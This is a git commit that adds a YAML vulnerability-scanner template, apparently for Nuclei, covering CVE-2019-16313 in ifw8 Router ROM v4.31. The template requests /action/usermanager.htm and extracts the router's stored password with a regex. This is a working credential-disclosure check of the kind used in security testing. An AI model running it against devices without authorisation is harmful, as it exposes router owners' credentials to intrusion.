Create CVE-2019-16313.yaml

patch-1
PikPikcU 2021-08-14 18:37:50 +07:00 committed by GitHub
parent 3b4eae6d53
commit 73f37aa7c5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 33 additions and 0 deletions

View File

@ -0,0 +1,33 @@
id: CVE-2019-16313
info:
name: ifw8 Router ROM v4.31 allows credential disclosure
author: pikpikcu
severity: high
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2019-16313
tags: cve,cve2019,tvt,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/action/usermanager.htm'
matchers-condition: and
matchers:
- type: word
words:
- 'user'
- 'pwd'
part: body
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- 'pwd : "([A-Za-z0-9=]+)",'